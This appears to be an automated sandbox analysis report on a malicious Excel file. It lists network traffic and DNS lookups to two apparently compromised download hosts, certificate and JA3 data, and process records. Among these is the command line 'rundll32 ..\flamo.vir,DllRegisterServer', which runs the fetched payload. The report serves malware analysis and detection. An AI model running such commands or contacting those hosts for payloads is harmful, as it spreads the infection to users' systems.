,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jun 29, 2021 17:40:32.109601021 CEST49165443192.168.2.22162.241.2.112
                                                                              Jun 29, 2021 17:40:32.272084951 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:32.272279978 CEST49165443192.168.2.22162.241.2.112
                                                                              Jun 29, 2021 17:40:32.281557083 CEST49165443192.168.2.22162.241.2.112
                                                                              Jun 29, 2021 17:40:32.451637030 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:32.464067936 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:32.464092016 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:32.464103937 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:32.464221954 CEST49165443192.168.2.22162.241.2.112
                                                                              Jun 29, 2021 17:40:32.512999058 CEST49165443192.168.2.22162.241.2.112
                                                                              Jun 29, 2021 17:40:32.713113070 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:32.713346958 CEST49165443192.168.2.22162.241.2.112
                                                                              Jun 29, 2021 17:40:34.069192886 CEST49165443192.168.2.22162.241.2.112
                                                                              Jun 29, 2021 17:40:34.271677017 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:35.198796034 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:35.198834896 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:35.198848009 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:35.198872089 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:35.198888063 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:35.198930979 CEST49165443192.168.2.22162.241.2.112
                                                                              Jun 29, 2021 17:40:35.198967934 CEST49165443192.168.2.22162.241.2.112
                                                                              Jun 29, 2021 17:40:35.199198961 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:35.199251890 CEST49165443192.168.2.22162.241.2.112
                                                                              Jun 29, 2021 17:40:35.200234890 CEST49165443192.168.2.22162.241.2.112
                                                                              Jun 29, 2021 17:40:35.361346960 CEST44349165162.241.2.112192.168.2.22
                                                                              Jun 29, 2021 17:40:35.397497892 CEST49168443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:35.559286118 CEST44349168108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:35.559483051 CEST49168443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:35.560208082 CEST49168443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:35.721808910 CEST44349168108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:35.722783089 CEST44349168108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:35.722816944 CEST44349168108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:35.722843885 CEST44349168108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:35.722858906 CEST44349168108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:35.722930908 CEST49168443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:35.722956896 CEST49168443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:35.729106903 CEST44349168108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:35.729341030 CEST49168443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:35.760533094 CEST49168443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:35.927985907 CEST44349168108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:35.928103924 CEST49168443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:36.528536081 CEST49168443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:36.731374979 CEST44349168108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:37.117383957 CEST44349168108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:37.117415905 CEST44349168108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:37.117592096 CEST49168443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:37.118180990 CEST49168443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:37.120270014 CEST49170443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:37.278953075 CEST44349170108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:37.279042006 CEST49170443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:37.279620886 CEST49170443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:37.280631065 CEST44349168108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:37.436506033 CEST44349170108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:37.444791079 CEST44349170108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:37.444859028 CEST49170443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:37.445382118 CEST49170443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:37.479882956 CEST49170443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:37.638313055 CEST44349170108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:38.026087999 CEST44349170108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:38.026150942 CEST44349170108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:38.026344061 CEST49170443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:38.026978970 CEST49170443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:38.028438091 CEST49171443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:38.184117079 CEST44349170108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:38.189817905 CEST44349171108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:38.189966917 CEST49171443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:38.190619946 CEST49171443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:38.353727102 CEST44349171108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:38.353754997 CEST44349171108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:38.354274988 CEST49171443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:38.354813099 CEST49171443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:38.390655994 CEST49171443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:38.553565979 CEST44349171108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:39.001461029 CEST44349171108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:39.001487017 CEST44349171108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:39.001722097 CEST49171443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:39.002619028 CEST49171443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:39.004996061 CEST49172443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:39.166378975 CEST44349171108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:39.167180061 CEST44349172108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:39.167383909 CEST49172443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:39.168292046 CEST49172443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:39.330358982 CEST44349172108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:39.331199884 CEST44349172108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:39.331335068 CEST49172443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:39.331768990 CEST49172443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:39.336335897 CEST49172443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:39.498384953 CEST44349172108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:39.907809973 CEST44349172108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:39.907890081 CEST49172443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:39.908579111 CEST44349172108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:39.908631086 CEST49172443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:39.910267115 CEST49172443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:39.911551952 CEST49173443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:40.074424028 CEST44349172108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:40.074461937 CEST44349173108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:40.074630976 CEST49173443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:40.075232983 CEST49173443192.168.2.22108.179.232.80
                                                                              Jun 29, 2021 17:40:40.239305973 CEST44349173108.179.232.80192.168.2.22
                                                                              Jun 29, 2021 17:40:40.239337921 CEST44349173108.179.232.80192.168.2.22

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jun 29, 2021 17:40:31.896029949 CEST5219753192.168.2.228.8.8.8
                                                                              Jun 29, 2021 17:40:32.089262009 CEST53521978.8.8.8192.168.2.22
                                                                              Jun 29, 2021 17:40:33.041228056 CEST5309953192.168.2.228.8.8.8
                                                                              Jun 29, 2021 17:40:33.090143919 CEST53530998.8.8.8192.168.2.22
                                                                              Jun 29, 2021 17:40:33.096836090 CEST5283853192.168.2.228.8.8.8
                                                                              Jun 29, 2021 17:40:33.142735958 CEST53528388.8.8.8192.168.2.22
                                                                              Jun 29, 2021 17:40:33.431018114 CEST6120053192.168.2.228.8.8.8
                                                                              Jun 29, 2021 17:40:33.491046906 CEST53612008.8.8.8192.168.2.22
                                                                              Jun 29, 2021 17:40:33.502192974 CEST4954853192.168.2.228.8.8.8
                                                                              Jun 29, 2021 17:40:33.579824924 CEST53495488.8.8.8192.168.2.22
                                                                              Jun 29, 2021 17:40:35.215225935 CEST5562753192.168.2.228.8.8.8
                                                                              Jun 29, 2021 17:40:35.393904924 CEST53556278.8.8.8192.168.2.22
                                                                              Jun 29, 2021 17:40:36.029781103 CEST5600953192.168.2.228.8.8.8
                                                                              Jun 29, 2021 17:40:36.079277039 CEST53560098.8.8.8192.168.2.22
                                                                              Jun 29, 2021 17:40:36.090101957 CEST6186553192.168.2.228.8.8.8
                                                                              Jun 29, 2021 17:40:36.137018919 CEST53618658.8.8.8192.168.2.22

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              Jun 29, 2021 17:40:31.896029949 CEST192.168.2.228.8.8.80x15d4Standard query (0)psq.com.mxA (IP address)IN (0x0001)
                                                                              Jun 29, 2021 17:40:35.215225935 CEST192.168.2.228.8.8.80xaa3aStandard query (0)academy.haleemcampus.comA (IP address)IN (0x0001)

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              Jun 29, 2021 17:40:32.089262009 CEST8.8.8.8192.168.2.220x15d4No error (0)psq.com.mx162.241.2.112A (IP address)IN (0x0001)
                                                                              Jun 29, 2021 17:40:35.393904924 CEST8.8.8.8192.168.2.220xaa3aNo error (0)academy.haleemcampus.com108.179.232.80A (IP address)IN (0x0001)

                                                                              HTTPS Packets

                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                              Jun 29, 2021 17:40:32.464103937 CEST162.241.2.112443192.168.2.2249165CN=psq.com.mx CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USTue Jul 28 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018Thu Jul 29 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                              CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                              Jun 29, 2021 17:40:35.729106903 CEST108.179.232.80443192.168.2.2249168CN=www.academy.haleemcampus.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue May 25 09:21:24 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Mon Aug 23 09:21:24 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                              CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                              CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                                                                              Code Manipulations

                                                                              Statistics

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Start time:17:40:35
                                                                              Start date:29/06/2021
                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              Wow64 process (32bit):false
                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                              Imagebase:0x13f860000
                                                                              File size:27641504 bytes
                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:17:42:31
                                                                              Start date:29/06/2021
                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:rundll32 ..\flamo.vir,DllRegisterServer
                                                                              Imagebase:0xff320000
                                                                              File size:45568 bytes
                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:17:42:32
                                                                              Start date:29/06/2021
                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:rundll32 ..\flamo.vir1,DllRegisterServer
                                                                              Imagebase:0xff320000
                                                                              File size:45568 bytes
                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Reset < >